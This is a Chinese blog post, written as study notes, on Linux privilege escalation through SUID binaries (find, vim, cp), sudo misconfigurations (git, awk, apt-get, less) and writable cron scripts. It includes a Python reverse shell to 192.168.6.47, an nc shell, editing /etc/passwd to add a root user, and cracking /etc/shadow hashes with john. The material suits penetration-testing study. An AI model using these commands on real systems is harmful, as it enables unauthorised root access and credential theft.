

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/cat.jpg">
  <link rel="icon" href="/img/cat.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Backk0m">
  <meta name="keywords" content="">
  
    <meta name="description" content="Linux提权写在前面，文章中的大多数内容在网上可以找到，我是为了在记录总结中学习，故此写下这篇文章 1.漏洞提权2.suid提权SUID是一种特殊权限，可以让调用者在执行过程中暂时获得该文件拥有者的权限。如果可以找到并运行root用户所拥有的SUID的文件，那么就可以在运行该文件的时候获得root用户权限 12chmod u+s filename #设置suidchmod u-s filenam">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux提权">
<meta property="og:url" content="http://backk0m.github.io/2024/06/01/Linux%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="Backk0m&#39;s Blog">
<meta property="og:description" content="Linux提权写在前面，文章中的大多数内容在网上可以找到，我是为了在记录总结中学习，故此写下这篇文章 1.漏洞提权2.suid提权SUID是一种特殊权限，可以让调用者在执行过程中暂时获得该文件拥有者的权限。如果可以找到并运行root用户所拥有的SUID的文件，那么就可以在运行该文件的时候获得root用户权限 12chmod u+s filename #设置suidchmod u-s filenam">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/160-1717158637642-3.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/161.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/162.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/164.png">
<meta property="article:published_time" content="2024-06-01T09:04:54.000Z">
<meta property="article:modified_time" content="2024-06-01T09:17:22.567Z">
<meta property="article:author" content="Backk0m">
<meta property="article:tag" content="提权">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/160-1717158637642-3.png">
  
  
  
  <title>Linux提权 - Backk0m&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"backk0m.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Linux提权"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-06-01 17:04" pubdate>
          2024年6月1日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          39 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Linux提权</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="Linux提权"><a href="#Linux提权" class="headerlink" title="Linux提权"></a>Linux提权</h2><p>写在前面，文章中的大多数内容在网上可以找到，我是为了在记录总结中学习，故此写下这篇文章</p>
<h3 id="1-漏洞提权"><a href="#1-漏洞提权" class="headerlink" title="1.漏洞提权"></a>1.漏洞提权</h3><h3 id="2-suid提权"><a href="#2-suid提权" class="headerlink" title="2.suid提权"></a>2.suid提权</h3><p>SUID是一种特殊权限，可以让调用者在执行过程中暂时获得该文件拥有者的权限。如果可以找到并运行root用户所拥有的SUID的文件，那么就可以在运行该文件的时候获得root用户权限</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">chmod</span> u+s filename <span class="hljs-comment">#设置suid</span><br><span class="hljs-built_in">chmod</span> u-s filename <span class="hljs-comment">#去除suid</span><br></code></pre></td></tr></table></figure>

<p>查找root用户拥有的文件</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">find</span> / -user root -perm -4000 -<span class="hljs-built_in">print</span> 2&gt;/dev/<span class="hljs-literal">null</span><br><span class="hljs-built_in">find</span> / -perm <span class="hljs-attribute">-u</span>=s -type f 2&gt;/dev/<span class="hljs-literal">null</span><br><span class="hljs-built_in">find</span> / -user root -perm -4000 -exec ls -ldb &#123;&#125; \;<br></code></pre></td></tr></table></figure>

<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">find</span> / -user root -perm -4000 -<span class="hljs-built_in">print</span> 2&gt;/dev/<span class="hljs-literal">null</span><br></code></pre></td></tr></table></figure>

<ul>
<li><code>find</code>: 这是一个用于在文件系统中查找文件的命令。</li>
<li><code>/</code>: 这表示要从根目录开始搜索，也就是整个文件系统。</li>
<li><code>-user root</code>: 这个选项指定要查找的文件的所有者是 root 用户。</li>
<li><code>-perm -4000</code>: 这个选项指定要查找的文件权限是设置了 SUID（Set User ID）权限的，SUID 权限是一种特殊权限，允许一个程序在执行时临时拥有其拥有者的权限。</li>
<li><code>-print</code>: 这个选项指定找到的文件应该被打印（显示）出来。</li>
<li><code>2&gt;/dev/null</code>: 这个部分是将标准错误重定向到 <code>/dev/null</code>，意味着任何错误信息将被忽略，这样做是为了避免显示由于权限不足而无法访问的目录或文件时产生的错误信息。</li>
</ul>
<h4 id="find"><a href="#find" class="headerlink" title="find"></a>find</h4><p>find + 目标目录(路径) + &lt;选项&gt; + 参数</p>
<p><code>find</code>用于在指定目录下查找文件。<code>-exec</code>参数可以用来执行命令，系统上find命令默认没有<code>SUID</code>权限</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">find -<span class="hljs-built_in">exec</span> <span class="hljs-built_in">whoami</span> \; -quit<br>find -<span class="hljs-built_in">exec</span> /bin/sh -p \; -quit<br></code></pre></td></tr></table></figure>

<p><code>-p</code> 不提供的情况下，打开bash权限是当前实际用户，提供的情况下，会打开特权模式，向上继承euid，因为bash有suid权限，所以这里是root。</p>
<p>反弹shell</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">find</span><span class="hljs-built_in"> user </span>-exec nc -lvp 4444 -e <span class="hljs-string">&#x27;/bin/sh&#x27;</span> \;<br>nc -lvnp 4444<br></code></pre></td></tr></table></figure>

<p>python反弹shell</p>
<figure class="highlight tcl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs tcl">python -c &#x27;import <span class="hljs-keyword">socket</span>,subprocess,os;s=<span class="hljs-keyword">socket</span>.<span class="hljs-keyword">socket</span>(<span class="hljs-keyword">socket</span>.AF_INET,<span class="hljs-keyword">socket</span>.SOCK_STREAM);s.connect((<span class="hljs-string">&quot;192.168.6.47&quot;</span>,<span class="hljs-number">7777</span>));os.dup2(s.fileno(),<span class="hljs-number">0</span>); os.dup2(s.fileno(),<span class="hljs-number">1</span>); os.dup2(s.fileno(),<span class="hljs-number">2</span>);p=subprocess.call([<span class="hljs-string">&quot;/bin/sh&quot;</span>,<span class="hljs-string">&quot;-i&quot;</span>]);&#x27;<br></code></pre></td></tr></table></figure>

<figure class="highlight tcl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs tcl">/usr/bin/find <span class="hljs-number">1.</span>txt -<span class="hljs-keyword">exec</span> python -c  &#x27;import <span class="hljs-keyword">socket</span>,subprocess,os;s=<span class="hljs-keyword">socket</span>.<span class="hljs-keyword">socket</span>(<span class="hljs-keyword">socket</span>.AF_INET,<span class="hljs-keyword">socket</span>.SOCK_STREAM);s.connect((<span class="hljs-string">&quot;192.168.6.47&quot;</span>,<span class="hljs-number">7777</span>));os.dup2(s.fileno(),<span class="hljs-number">0</span>); os.dup2(s.fileno(),<span class="hljs-number">1</span>); os.dup2(s.fileno(),<span class="hljs-number">2</span>);p=subprocess.call([<span class="hljs-string">&quot;/bin/sh&quot;</span>,<span class="hljs-string">&quot;-i&quot;</span>]);&#x27; \;<br></code></pre></td></tr></table></figure>

<h4 id="vim"><a href="#vim" class="headerlink" title="vim"></a>vim</h4><p>当vim具有suid权限后，意味着任何用户都可以使用vim命令来编辑那些只能由root编辑的文件，例如 <code>/etc/sudoers</code> 文件 ，在sudoers文件中配置普通用户的权限，权限和root一样</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs subunit"><span class="hljs-keyword">test </span>ALL=(ALL:ALL) ALL<br></code></pre></td></tr></table></figure>

<p>vim编辑后保存时用 wq!强制保存，vim运行时虽然是root权限，但是wq依然会提示只读</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs 1c">sudo bash  <span class="hljs-comment">//切换到root用户</span><br></code></pre></td></tr></table></figure>

<h4 id="cp"><a href="#cp" class="headerlink" title="cp"></a>cp</h4><p><code>cp</code> 和 <code>mv</code> 是Linux 系统中常用的命令，用于文件和目录的复制和移动</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">cp file1<span class="hljs-selector-class">.txt</span> file2<span class="hljs-selector-class">.txt</span>    <span class="hljs-comment">//将file1.txt文件复制到 file2.txt</span><br>mv file1<span class="hljs-selector-class">.txt</span> file2.txt<br></code></pre></td></tr></table></figure>

<p>当cp 有suid权限的时候我们可以修改 &#x2F;etc&#x2F;passwd    &#x2F;etc&#x2F;shadow</p>
<p><strong>&#x2F;etc&#x2F;passwd</strong> 文件</p>
<p>首先用openssl生成一个密码，passwd参数表示生成一个密码，-1表示md5,-salk表示盐(随意指定)，最后跟要加密的值</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs elixir">└─<span class="hljs-variable">$ </span>openssl passwd <span class="hljs-number">-1</span> -salt hello <span class="hljs-number">123456</span><br><span class="hljs-variable">$1</span><span class="hljs-variable">$hello</span><span class="hljs-variable">$ZwmhCpcG</span>.<span class="hljs-title class_">I1XIfVjdarKc1</span><br></code></pre></td></tr></table></figure>

<p>按照etc&#x2F;passwd的格式添加一个新用户，权限按root的写即可。</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs elixir"><span class="hljs-symbol">test1:</span><span class="hljs-variable">$1</span><span class="hljs-variable">$hello</span><span class="hljs-variable">$ZwmhCpcG</span>.<span class="hljs-symbol">I1XIfVjdarKc1:</span><span class="hljs-number">0</span><span class="hljs-symbol">:</span><span class="hljs-number">0</span><span class="hljs-symbol">:root</span><span class="hljs-symbol">:/root</span><span class="hljs-symbol">:/usr/bin/zsh</span><br></code></pre></td></tr></table></figure>

<p><code>cp passwd /etc/passwd</code><br>替换&#x2F;etc&#x2F;passwd</p>
<p><code>su abc</code><br>输入密码abc</p>
<p>登录成功，则为root权限了</p>
<p><strong>&#x2F;etc&#x2F;shadow</strong> 文件</p>
<p>读 &#x2F;etc&#x2F;shadow文件, 内容中的每一行代表一个用户,可以在每行的第一个和第二个冒号之间找到用户的密码hash值。  </p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">root</span>:$<span class="hljs-number">1</span>$<span class="hljs-number">1</span>$dzqAUU/vB2clNL4EHnbXq0:<span class="hljs-number">19590</span>:<span class="hljs-number">0</span>:<span class="hljs-number">99999</span>:<span class="hljs-number">7</span>:::<br></code></pre></td></tr></table></figure>

<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs elixir">加密算法<br><span class="hljs-variable">$6</span><span class="hljs-variable">$开</span>头的，表明是用<span class="hljs-title class_">SHA</span><span class="hljs-number">-512</span>加密<br><span class="hljs-variable">$1</span><span class="hljs-variable">$ </span>表明是用<span class="hljs-title class_">MD5</span>加密<br><span class="hljs-variable">$2</span><span class="hljs-variable">$ </span>是用<span class="hljs-title class_">Blowfish</span>加密<br><span class="hljs-variable">$5</span><span class="hljs-variable">$ </span>是用 <span class="hljs-title class_">SHA</span><span class="hljs-number">-256</span>加密的。<br></code></pre></td></tr></table></figure>

<p>我们可以将密码的hash值复制到桌面 hash文件中，用命令 </p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">└─# john hash <span class="hljs-comment">--wordlist=/usr/share/wordlists/rockyou.txt</span><br><span class="hljs-built_in">Warning</span>: detected hash <span class="hljs-keyword">type</span> &quot;md5crypt&quot;, but the string <span class="hljs-keyword">is</span> <span class="hljs-keyword">also</span> recognized <span class="hljs-keyword">as</span> &quot;md5crypt-long&quot;<br>Use the &quot;--format=md5crypt-long&quot; <span class="hljs-keyword">option</span> <span class="hljs-keyword">to</span> force loading these <span class="hljs-keyword">as</span> that <span class="hljs-keyword">type</span> <span class="hljs-keyword">instead</span><br><span class="hljs-keyword">Using</span> <span class="hljs-keyword">default</span> <span class="hljs-keyword">input</span> <span class="hljs-keyword">encoding</span>: UTF<span class="hljs-number">-8</span><br>Loaded <span class="hljs-number">1</span> <span class="hljs-keyword">password</span> hash (md5crypt, crypt(<span class="hljs-number">3</span>) <span class="hljs-meta">$1</span>$ (<span class="hljs-keyword">and</span> variants) [MD5 <span class="hljs-number">128</span>/<span class="hljs-number">128</span> AVX <span class="hljs-number">4</span>x3])<br>Will run <span class="hljs-number">4</span> OpenMP threads<br>Press <span class="hljs-string">&#x27;q&#x27;</span> <span class="hljs-keyword">or</span> Ctrl-C <span class="hljs-keyword">to</span> <span class="hljs-keyword">abort</span>, almost <span class="hljs-keyword">any</span> other key <span class="hljs-keyword">for</span> status<br><span class="hljs-number">123</span>abc           (?) #密码    <br><span class="hljs-number">1</span>g <span class="hljs-number">0</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span> DONE (<span class="hljs-number">2024</span><span class="hljs-number">-05</span><span class="hljs-number">-29</span> <span class="hljs-number">07</span>:<span class="hljs-number">54</span>) <span class="hljs-number">100.0</span>g/s <span class="hljs-number">38400</span>p/s <span class="hljs-number">38400</span>c/s <span class="hljs-number">38400</span>C/s alyssa..michael1<br>Use the &quot;--show&quot; <span class="hljs-keyword">option</span> <span class="hljs-keyword">to</span> display <span class="hljs-keyword">all</span> <span class="hljs-keyword">of</span> the cracked passwords reliably<br><span class="hljs-keyword">Session</span> completed.<br><br>#这里需要说明一下，john不会破解之前已经破解过的密文，可以使用命令查看之前破解的密文<br><br>方法一<br>┌──(kali㉿kali)-[~/桌面]<br>└─$ cat /home/kali/.john/john.pot<br><span class="hljs-meta">$1</span><span class="hljs-meta">$1</span>$dzqAUU/vB2clNL4EHnbXq0:<span class="hljs-number">123</span>abc<br><br>方法二<br>┌──(kali㉿kali)-[~/桌面]<br>└─$ john <span class="hljs-comment">--show hash                                     </span><br>?:<span class="hljs-number">123</span>abc<br></code></pre></td></tr></table></figure>

<p>补充一个关于 docker中<code>su username</code>,可能会报<code>must be run from terminal</code>;解决方案</p>
<p>用的比较多的解决方案：</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gcode">pytho<span class="hljs-symbol">n3</span> -c <span class="hljs-string">&quot;import pty; pty.spawn(&#x27;/bin/bash&#x27;)&quot;</span><br></code></pre></td></tr></table></figure>

<h3 id="3-sudo提权"><a href="#3-sudo提权" class="headerlink" title="3.sudo提权"></a>3.sudo提权</h3><p>普通用户可以无密码提升到管理员权限</p>
<p>前提是&#x2F;etc&#x2F;sudoers写了这个普通用户可以无密码执行命令</p>
<p>文件语法：</p>
<p>root ALL&#x3D;(ALL) ALL</p>
<ul>
<li>root表示用户名</li>
<li>第一个 ALL 指示允许从任何终端、机器访问sudo</li>
<li>第二个 (ALL)指示sudo命令被允许以任何用户身份执行</li>
<li>第三个 ALL 表示所有命令都可以作为root执行</li>
</ul>
<figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs arcade">backkom <span class="hljs-built_in">ALL</span>=(root) NOPASSWD: <span class="hljs-regexp">/usr/</span>bin/awk<br>backk0m <span class="hljs-built_in">ALL</span>=(root) NOPASSWD: <span class="hljs-regexp">/usr/</span>bin/apt-get<br></code></pre></td></tr></table></figure>

<p>允许用户 <code>backk0m</code> 在所有主机上无需密码以 <code>root</code> 身份运行 <code>/usr/bin/apt-get</code></p>
<p>![](E:\Personal Notes\WEB\Drone aircraft\assets\158.png)</p>
<h4 id="git"><a href="#git" class="headerlink" title="git"></a>git</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#1:</span><br>sudo git <span class="hljs-built_in">help</span> config<br>!/bin/bash<br><span class="hljs-comment">#2:</span><br>sudo git -p <span class="hljs-built_in">help</span><br>!/bin/bash<br></code></pre></td></tr></table></figure>

<h4 id="awk"><a href="#awk" class="headerlink" title="awk"></a>awk</h4><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">sudo awk <span class="hljs-symbol">&#x27;BEGIN</span>&#123;system(<span class="hljs-string">&quot;/bin/bash&quot;</span>)&#125;&#x27;<br></code></pre></td></tr></table></figure>

<p>我们输入这条命令后就会直接进入 root权限</p>
<h4 id="apt-get"><a href="#apt-get" class="headerlink" title="apt-get"></a>apt-get</h4><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby">sudo apt-get update -o <span class="hljs-variable constant_">APT</span><span class="hljs-symbol">:</span><span class="hljs-symbol">:Update</span><span class="hljs-symbol">:</span><span class="hljs-symbol">:Pre-Invoke</span><span class="hljs-symbol">:</span><span class="hljs-symbol">:</span>=<span class="hljs-regexp">/bin/sh</span><br></code></pre></td></tr></table></figure>

<p>我们输入这条命令后就会直接进入 root权限</p>
<h4 id="less"><a href="#less" class="headerlink" title="less"></a>less</h4><figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs crystal">┌──(kali㉿kali)-[~<span class="hljs-regexp">/桌面]</span><br><span class="hljs-regexp">└─$ sudo less /etc</span><span class="hljs-regexp">/passwd</span><br><span class="hljs-regexp">#直接输入!/bin</span><span class="hljs-regexp">/bash</span><br><span class="hljs-regexp">┌──(root㉿kali)-[/home</span><span class="hljs-regexp">/kali/</span>桌面]<br>└─<span class="hljs-comment"># </span><br></code></pre></td></tr></table></figure>

<p>更多提权命令请参考：  <a target="_blank" rel="noopener" href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p>
<h3 id="4-Cron-jobs提权"><a href="#4-Cron-jobs提权" class="headerlink" title="4.Cron jobs提权"></a>4.Cron jobs提权</h3><p>定时任务（cron job）被用于安排那些需要被周期性执行的命令。利用它可以配置某些命令或者脚本，让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务（守护进程）在系统后台运行，并且会持续地检查 &#x2F;etc&#x2F;crontab 文件和 &#x2F;etc&#x2F;cron.*&#x2F; 目录。它同样也会检查 &#x2F;var&#x2F;spool&#x2F;cron&#x2F; 目录</p>
<p>提权的前提是存在一个执行危险脚本的任务计划，并且这个任务计划执行的执行脚本可以被非root权限用户修改覆盖，并可以正常执行任务计划</p>
<figure class="highlight gherkin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs gherkin"><span class="hljs-symbol">*</span> <span class="hljs-symbol">*</span> <span class="hljs-symbol">*</span> <span class="hljs-symbol">*</span> <span class="hljs-symbol">*</span> command_to_execute<br>- - - - -<br>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<br>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string"> +----- 星期几 (0 - 7) (Sunday=0 or 7)</span><br><span class="hljs-string"></span>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string"> +------- 月份 (1 - 12)</span><br><span class="hljs-string"></span>|<span class="hljs-string"> </span>|<span class="hljs-string"> +--------- 日期 (1 - 31)</span><br><span class="hljs-string"></span>|<span class="hljs-string"> +----------- 小时 (0 - 23)</span><br><span class="hljs-string">+------------- 分钟 (0 - 59)</span><br><span class="hljs-string">*：（星号）代表取值范围中的每一个数字</span><br><span class="hljs-string">-：（减号）连续区间表达式，想要代表1~7，则需要写成1-7</span><br><span class="hljs-string">/：（斜杠）表示每x个。例如想在每10分钟执行一次，则在分的位置写：*/10</span><br><span class="hljs-string">,：（逗号）表示多个取值。如果想在1点，3点，5点执行一次，则在时的位置写：1,3,5</span><br></code></pre></td></tr></table></figure>

<h4 id="文件覆盖"><a href="#文件覆盖" class="headerlink" title="文件覆盖"></a>文件覆盖</h4><p>我们以root用户添加下面这条定时任务</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">*<span class="hljs-string">/1</span> *   * * *   root    <span class="hljs-string">/tmp/clear.py</span><br></code></pre></td></tr></table></figure>

<p>创建clear.py脚本，并赋可执行权限<code>chmod +x /tmp/clear.py</code></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-comment">#!/usr/bin/env python3</span><br>import os<br>import sys<br><br>try:<br>    os.system(<span class="hljs-string">&quot;rm -rf /tmp/test&quot;</span>)<br>except:<br>    sys.<span class="hljs-keyword">exit</span>()<br></code></pre></td></tr></table></figure>

<p>如果可以修改定时任务的文件(clear.py)，就可以提权，例如将上面的clear.py修改内容</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-comment">#!/usr/bin/env python3</span><br>import os<br>import sys<br><br>try:<br>    os.system(<span class="hljs-string">&quot;chmod u+s /bin/bash&quot;</span>)<br>except:<br>    sys.<span class="hljs-keyword">exit</span>()<br></code></pre></td></tr></table></figure>

<p>在执行<code>/bin/bash -p</code>命令即可得到root权限</p>
<p><code>-p</code> 参数的意思是向上继承，继承suid权限</p>
<h4 id="通配符注入"><a href="#通配符注入" class="headerlink" title="通配符注入"></a>通配符注入</h4><p>linux中有很多通配符，和正则类似，例如tar一个目录，如果写*，就代表压缩当前目录下的所有文件，*代表一个或多个字符</p>
